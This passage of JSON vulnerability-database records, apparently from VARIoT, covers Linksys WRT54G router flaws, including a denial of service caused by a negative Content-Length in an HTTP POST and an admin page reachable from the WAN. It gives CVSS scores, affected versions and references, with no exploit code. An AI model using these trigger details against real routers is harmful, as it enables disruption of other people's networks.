"url": "/archive/1/426761"
},
{
"trust": 0.3,
"url": "/archive/1/426756"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"db": "VULHUB",
"id": "VHN-17175"
},
{
"db": "BID",
"id": "16954"
},
{
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-07T00:00:00",
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"date": "2006-03-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"date": "2006-03-07T00:00:00",
"db": "VULHUB",
"id": "VHN-17175"
},
{
"date": "2006-03-04T00:00:00",
"db": "BID",
"id": "16954"
},
{
"date": "2006-03-07T22:06:00",
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"date": "2006-03-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2006-03-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2006-1318"
},
{
"date": "2018-10-18T00:00:00",
"db": "VULHUB",
"id": "VHN-17175"
},
{
"date": "2016-07-06T14:40:00",
"db": "BID",
"id": "16954"
},
{
"date": "2018-10-18T16:30:32.073000",
"db": "NVD",
"id": "CVE-2006-1067"
},
{
"date": "2006-03-09T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Multiple router denial of service vulnerability",
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNVD",
"id": "CNVD-2006-1318"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "IVD",
"id": "ccdf0954-2354-11e6-abef-000c29c66e3d"
},
{
"db": "CNNVD",
"id": "CNNVD-200603-107"
}
],
"trust": 0.8
}
}
VAR-200509-0093
Vulnerability from variot - Updated: 2023-12-18 12:24Linksys WRT54G router allows remote attackers to cause a denial of service (CPU consumption and server hang) via an HTTP POST request with a negative Content-Length value. WRT54G v1.0 is prone to a denial-of-service vulnerability. Linksys WRT54G is a Cisco wireless router
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "4.00.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:4.00.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2912"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89346"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2912",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-14121",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2912",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-130",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-14121",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G router allows remote attackers to cause a denial of service (CPU consumption and server hang) via an HTTP POST request with a negative Content-Length value. WRT54G v1.0 is prone to a denial-of-service vulnerability. Linksys WRT54G is a Cisco wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "VULHUB",
"id": "VHN-14121"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2912",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G MANAGEMENT INTERFACE DOS VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "89346",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14121",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"id": "VAR-200509-0093",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T12:24:17.858000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2912"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=308\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=308\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14121"
},
{
"db": "BID",
"id": "89346"
},
{
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14121"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89346"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14121"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89346"
},
{
"date": "2008-09-05T20:52:58.640000",
"db": "NVD",
"id": "CVE-2005-2912"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Denial of service vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-130"
}
],
"trust": 0.6
}
}
VAR-200412-0788
Vulnerability from variot - Updated: 2023-12-18 12:13The Web interface in Linksys WRT54G 2.02.7 and BEFSR41 version 3, with the firewall disabled, allows remote attackers to attempt to login to an administration web page, even when the configuration specifies that remote administration is disabled. Linksys WRT54G Router is a router device.
Even when the management function is turned off, Linksys WRT54G Router still provides 80 and 443 port management web pages on the WAN interface. As a result, an attacker can access the management interface. In combination with other loopholes, the router may be controlled. A weakness is reported to affect the Linksys WRT54G appliance
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200412-0788",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.02.7"
},
{
"model": "befsr41 v3",
"scope": "eq",
"trust": 1.0,
"vendor": "linksys",
"version": "*"
},
{
"model": null,
"scope": null,
"trust": 0.6,
"vendor": "none",
"version": null
},
{
"model": "befsr41 v3",
"scope": null,
"trust": 0.6,
"vendor": "linksys",
"version": null
},
{
"model": "samadhi2 .6sv",
"scope": "eq",
"trust": 0.3,
"vendor": "sveasoft",
"version": "2.0.8"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.00.8"
},
{
"model": "wpc300n wireless-n notebook adapter",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "-4.100.15.5"
},
{
"model": "wrt54g beta",
"scope": "ne",
"trust": 0.3,
"vendor": "linksys",
"version": "v2.02.02.8"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:befsr41_v3:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.02.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-2606"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Alan W. Rateliff, II\u203b lists@rateliff.net",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 0.6
},
"cve": "CVE-2004-2606",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": true,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-11034",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-2606",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200412-618",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-11034",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The Web interface in Linksys WRT54G 2.02.7 and BEFSR41 version 3, with the firewall disabled, allows remote attackers to attempt to login to an administration web page, even when the configuration specifies that remote administration is disabled. Linksys WRT54G Router is a router device. \n\n\u00a0Even when the management function is turned off, Linksys WRT54G Router still provides 80 and 443 port management web pages on the WAN interface. As a result, an attacker can access the management interface. In combination with other loopholes, the router may be controlled. A weakness is reported to affect the Linksys WRT54G appliance",
"sources": [
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "VULHUB",
"id": "VHN-11034"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2004-2606",
"trust": 2.3
},
{
"db": "BID",
"id": "10441",
"trust": 2.0
},
{
"db": "OSVDB",
"id": "6577",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "11754",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2004-1560",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040604 THE LINKSYS WRT54G \"SECURITY PROBLEM\" DOESN\u0027T EXIST",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040604 RE: THE LINKSYS WRT54G \"SECURITY PROBLEM\" DOESN\u0027T EXIST",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040601 RE: LINKSYS WRT54G ADMINISTRATION PAGE AVAILBLE TO WAN",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040602 RE: THE LINKSYS WRT54G \"SECURITY PROBLEM\" DOESN\u0027T EXIST",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040602 ADDITIONAL INFORMATION ON WRT54G ADMINISTRATION PAGE",
"trust": 0.6
},
{
"db": "BUGTRAQ",
"id": "20040531 LINKSYS WRT54G ADMINISTRATION PAGE AVAILBLE TO WAN",
"trust": 0.6
},
{
"db": "NSFOCUS",
"id": "6513",
"trust": 0.6
},
{
"db": "XF",
"id": "16274",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-11034",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"id": "VAR-200412-0788",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-11034"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T12:13:40.262000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-2606"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/10441"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-05/0316.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-06/0002.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-06/0020.html"
},
{
"trust": 1.7,
"url": "http://archives.neohapsis.com/archives/bugtraq/2004-06/0190.html"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/365227/30/0/threaded"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/archive/1/365175"
},
{
"trust": 1.7,
"url": "ftp://ftp.linksys.com/pub/network/wrt54g_2.02.8_us_code_beta.zip"
},
{
"trust": 1.7,
"url": "http://web.archive.org/web/20040823075750/http://www.linksys.com/download/firmware.asp?fwid=201"
},
{
"trust": 1.7,
"url": "http://www.nwfusion.com/news/2004/0607confuse.html"
},
{
"trust": 1.7,
"url": "http://www.osvdb.org/6577"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/11754"
},
{
"trust": 1.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16274"
},
{
"trust": 0.6,
"url": "http://xforce.iss.net/xforce/xfdb/16274"
},
{
"trust": 0.6,
"url": "http://www.nsfocus.net/vulndb/6513"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/download/firmware.asp?fwid=201"
},
{
"trust": 0.3,
"url": "http://www.sveasoft.com/modules/phpbb2/index.php"
},
{
"trust": 0.3,
"url": "http://www.linksys.com/products/product.asp?prid=508\u0026scid=35"
},
{
"trust": 0.3,
"url": "/archive/1/364977"
},
{
"trust": 0.3,
"url": "/archive/1/364729"
},
{
"trust": 0.3,
"url": "/archive/1/365175"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "VULHUB",
"id": "VHN-11034"
},
{
"db": "BID",
"id": "10441"
},
{
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"date": "2004-12-31T00:00:00",
"db": "VULHUB",
"id": "VHN-11034"
},
{
"date": "2004-05-31T00:00:00",
"db": "BID",
"id": "10441"
},
{
"date": "2004-12-31T05:00:00",
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"date": "2004-05-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2004-05-31T00:00:00",
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"date": "2017-07-11T00:00:00",
"db": "VULHUB",
"id": "VHN-11034"
},
{
"date": "2004-05-31T00:00:00",
"db": "BID",
"id": "10441"
},
{
"date": "2017-07-11T01:32:03",
"db": "NVD",
"id": "CVE-2004-2606"
},
{
"date": "2006-01-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Router Global Access Management Service Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2004-1560"
},
{
"db": "CNNVD",
"id": "CNNVD-200412-618"
}
],
